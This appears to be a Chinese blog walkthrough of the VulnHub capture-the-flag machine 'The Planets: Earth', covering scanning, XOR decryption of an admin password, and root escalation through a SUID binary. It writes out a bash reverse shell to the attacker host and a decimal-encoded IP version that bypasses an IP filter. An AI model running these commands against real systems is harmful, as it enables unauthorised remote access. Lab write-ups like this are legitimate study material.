靶机The Planets: Earth渗透记录

前段时间忙于比赛，现在要继续开始学习了，不过又因为期末了所以靶机渗透更新的还是很慢…
本人学疏才浅，大佬们轻喷…

下载地址：https://www.vulnhub.com/entry/the-planets-earth,755/

准备

靶机The Planets: Earth×1 NAT模式
渗透机kali 2021.2×1 和靶机在同一网段

信息搜集

用arp-scan扫描ip，然后用mac地址确定目标

扫扫扫

1	nmap -sS -sV -A -Pn -n -p- 192.168.155.164

根据nmap扫描的结果可以发现我们是需要加host才能打开那两个网址
访问靶机ip也就一个服务开启的默认界面

加上host之后打开

渗透测试

测试界面，啊我不信
另外一个地址打开后是类似一个留言功能的业务

好像没啥漏洞，不过发送记录会展示在页面，发现了三串数字

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

用dirb扫描了一下，发现有个后台

不过需要用户名和密码

另外一个也用dirb扫了一下，发现robots.txt是有东西的

比较可疑的是最后的居然屏蔽的是文件格式，那就试一下吧。
发现/testingnotes.txt有提示

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

去访问了一下testdata.txt，发现了几句话。

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

根据提示可以看出来，我们需要解密之前留言板上的密文————用testdata.txt异或解密
找在线网站解密一下，拿到了密码earthclimatechangebad4humans

登录之后发现了命令行交互，于是决定打个反弹shell

1	bash -i >& /dev/tcp/192.168.155.128/2333 0>&1

但是失败了，好像是对ip有限制

于是尝试绕过

https://www.ipaddressguide.com/ip

1	bash -i >& /dev/tcp/3232275328/2333 0>&1

拿到了第一个flag

提权

1	find / -perm -u=s -type f 2>/dev/null

先去看一下/usr/bin/reset_root

执行失败

是一个可执行的二进制文件，可以利用nc传输到kali攻击机上。

1	ltrace -S ./reset_root

可以看到程序运行的时候提示缺少了几个文件

那咋办呢？那就创建一个吧
在靶机上创建好后去运行，拿到了root的密码Earth

于是su切换到root用户输入密码
进入/root目录，拿到第二个flag

至此，渗透结束。

暮晓春来迟，先于百花知。岁岁种桃花，开在断肠时。